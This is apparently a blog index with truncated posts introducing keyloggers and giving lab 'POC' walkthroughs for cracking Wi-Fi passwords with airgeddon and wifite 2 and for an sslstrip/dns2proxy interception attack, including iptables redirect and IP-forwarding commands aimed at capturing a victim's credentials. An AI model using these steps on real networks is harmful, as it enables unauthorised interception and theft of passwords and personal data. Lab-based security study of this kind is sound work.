Posts

Documentation on keylogger

Image
Documentation on keylogger Introduction:- Keylogger is a type of software that once installed on a system, has capability to record every keystroke made by the system. All the recorded keystroke is saved in a log file. A keylogger can record message,email,and capture any type of information you type at any time using your keyboard. Who uses keylogger?:- Keylogger is a surveillance tool,used by employers to ensure employee use work computers for business purposes only. There’s also a growing market of parents who want to use this tools to stay informed about a child’s online activities. But now a days this tools is use by hacker for hacking email id’s and confidential information of the user like password and id of the bank account,this is one of the easiest way of hacking the ID’s,because keylogger is a device or a software while gives all the information that which key is typed by the user and through this software hackers hack the ID’s easily.    About keyl...

Airgeddon framework

Image
POC OF AIRGEDDON FRAMEWORK Introduction:- Airgeddon is a automated tools by which we can crack wifi password. Lab environment:- Atacker’s Operating system:-linux kali 4.13.0-kali-amd64 Wifi adapter:-TP-Link TL-WN727N 150Mbps Wireless N USB Adapter Framework:- airgeddon Step 1:- Copy the github link( https://github.com/v1s1t0r1sh3r3/airgeddon ) and clone it in the desktop. Step 2:- Then i check the permission of all the file inside the airgedden i found that airgedden is not a executable file. Step 3:- Then change the permission of airgeddon.sh form -rw-r--r-- to -rwxrwxrwx by typing chmod 777 airgeddon.sh Step 4:- Connect wifi adoptar and Run airgeddon.sh.We have the framework in front of us. Step 5:- Then check the requirement what this script need for running this script.there is some error show in this script but we don't want any package for cracking the password so hit enter do ahead. Step 6:- Then select the interface to work wit...

POC OF WIFITE 2

Image
POC OF WIFITE 2 Introduction:- Wifite version 2 is a automated tools by which we can crack wifi password. Lab environment:- Atacker’s Operating system:-linux kali 4.13.0-kali-amd64 Wifi adapter:-TP-Link TL-WN727N 150Mbps Wireless N USB Adapter Framework:- wifite version 2 Step 1:- Plug the wifi adapter. Open the wifite version 2 framework then we have a screen like given below. Step 2:- Then this framework automatically start the monitoring access points which is within the range of the adapter.then we have list of all the access point which is listed below.   Step 3:- Then stop the scanning by CTRL+C and set the target i set the target no. 1 after set the target this tools sending the deauthentication packets to the clients of the access point after disconnect the client. Client automatically reconnect to the access point when the client reconnect the access point this tools capture the  handshake and save in default destination in root ....

POC OF sslstrip with dns2proxy

Image
POC OF sslstrip with dns2proxy Introduction:- This is a POC of sslstrip. Here We intercept the traffic and get all the juicy data enter by the victim by using the sslstrip-master,dns2proxy-master Lab Environment:- Attacker’s operating system:-linux kali 4.13.0-kali-amd64 Victim’s operating system:-window 7 Required tools:-sslstrip-master,dns2proxy-master Steps of attack:- Step 1: #cd sslstrip-master/(change directory to sslstrip-master) #python setup.py install(install sslstrip-master) Step 2: #echo “1” > /proc/sys/net/ipv4/ip_forward(Enables IP forwarding) #iptables --flush( Removing all firewall rules ) #iptables --flush -t nat() #iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000(forward all the traffic to port number 9000) #iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53 Step 3: #ifconfig(for finding the ip address of the attacker’s machine 192.168.29...